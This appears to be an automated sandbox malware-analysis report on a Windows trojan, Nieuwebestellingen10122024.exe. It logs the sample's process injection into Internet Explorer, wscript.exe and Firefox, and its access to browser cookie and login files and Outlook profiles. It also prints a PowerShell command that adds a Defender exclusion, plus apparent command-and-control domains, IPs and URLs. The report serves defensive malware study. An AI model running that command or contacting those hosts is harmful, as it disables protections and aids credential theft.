                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: NULL target: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 7848Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeThread APC queued: target process: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 954008Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -ForceJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeQueries volume information: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                21
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution
                1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory123
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)512
                Process Injection
                1
                Abuse Elevation Control Mechanism
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Registry Run Keys / Startup Folder
                3
                Obfuscated Files or Information
                NTDS351
                Security Software Discovery
                Distributed Component Object ModelInput Capture5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets2
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials161
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items161
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572930 Sample: Nieuwebestellingen10122024.exe Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 70 www.swenansiansie.xyz 2->70 72 www.restobarbebek.xyz 2->72 74 27 other IPs or domains 2->74 98 Suricata IDS alerts for network traffic 2->98 100 Antivirus detection for URL or domain 2->100 102 Multi AV Scanner detection for submitted file 2->102 106 5 other signatures 2->106 11 Nieuwebestellingen10122024.exe 1 4 2->11         started        14 iexplore.exe 2->14         started        16 svchost.exe 2->16         started        19 iexplore.exe 2->19         started        signatures3 104 Performs DNS queries to domains with low reputation 72->104 process4 dnsIp5 114 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->114 116 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->116 118 Writes to foreign memory regions 11->118 120 3 other signatures 11->120 21 iexplore.exe 11->21         started        24 powershell.exe 23 11->24         started        26 WerFault.exe 23 16 11->26         started        32 2 other processes 11->32 28 iexplore.exe 101 14->28         started        68 127.0.0.1 unknown unknown 16->68 30 iexplore.exe 19->30         started        signatures6 process7 signatures8 108 Maps a DLL or memory area into another process 21->108 34 tCyxXhRNgdPI.exe 21->34 injected 110 Loading BitLocker PowerShell Module 24->110 37 WmiPrvSE.exe 24->37         started        39 conhost.exe 24->39         started        41 iexplore.exe 28->41         started        44 iexplore.exe 28->44         started        process9 dnsIp10 96 Found direct / indirect Syscall (likely to bypass EDR) 34->96 46 wscript.exe 1 13 34->46         started        84 sb.scorecardresearch.com 18.165.220.110, 443, 49825, 49826 MIT-GATEWAYSUS United States 41->84 86 code.jquery.com 151.101.130.137, 443, 49831, 49832 FASTLYUS United States 41->86 49 ie_to_edge_stub.exe 41->49         started        51 ssvagent.exe 41->51         started        88 prod.appnexus.map.fastly.net 151.101.1.108, 443, 49878, 49879 FASTLYUS United States 44->88 signatures11 process12 signatures13 122 Tries to steal Mail credentials (via file / registry access) 46->122 124 Tries to harvest and steal browser information (history, passwords, etc) 46->124 126 Modifies the context of a thread in another process (thread injection) 46->126 128 3 other signatures 46->128 53 tCyxXhRNgdPI.exe 46->53 injected 57 firefox.exe 46->57         started        59 msedge.exe 49->59         started        process14 dnsIp15 76 rtpsilva4d.click 67.223.117.169, 50119, 50120, 50122 VIMRO-AS15189US United States 53->76 78 www.jagdud.store 209.74.64.187, 50069, 50075, 50081 MULTIBAND-NEWHOPEUS United States 53->78 82 6 other IPs or domains 53->82 112 Found direct / indirect Syscall (likely to bypass EDR) 53->112 80 239.255.255.250 unknown Reserved 59->80 61 msedge.exe 59->61         started        64 msedge.exe 59->64         started        66 msedge.exe 59->66         started        signatures16 process17 dnsIp18 90 googlehosted.l.googleusercontent.com 172.217.19.225, 443, 49790 GOOGLEUS United States 61->90 92 162.159.61.3, 443, 49795, 49807 CLOUDFLARENETUS United States 61->92 94 2 other IPs or domains 61->94

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Nieuwebestellingen10122024.exe37%ReversingLabsWin64.Trojan.Swotter
                Nieuwebestellingen10122024.exe31%VirustotalBrowse
                Nieuwebestellingen10122024.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                swenansiansie.xyz0%VirustotalBrowse
                cbprecise.online0%VirustotalBrowse
                rtpsilva4d.click0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://giganet.ua/ru0%Avira URL Cloudsafe
                http://www.restobarbebek.xyz/jm9b/100%Avira URL Cloudmalware
                https://www.imena.ua/domains0%Avira URL Cloudsafe
                https://img.imena.ua/js/bundle.min.js0%Avira URL Cloudsafe
                http://inau.ua/0%Avira URL Cloudsafe
                https://www.imena.ua/documents0%Avira URL Cloudsafe
                http://www.spectre.center/v70f/0%Avira URL Cloudsafe
                http://www.rtpsilva4d.click/mbcs/0%Avira URL Cloudsafe
                https://www.imena.ua/en/how-search0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-dark0%Avira URL Cloudsafe
                https://www.imena.ua/vps0%Avira URL Cloudsafe
                https://www.imena.ua/hosting0%Avira URL Cloudsafe
                http://www.wiretap.digital/gofy/?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ==0%Avira URL Cloudsafe
                http://www.wiretap.digital/gofy/0%Avira URL Cloudsafe
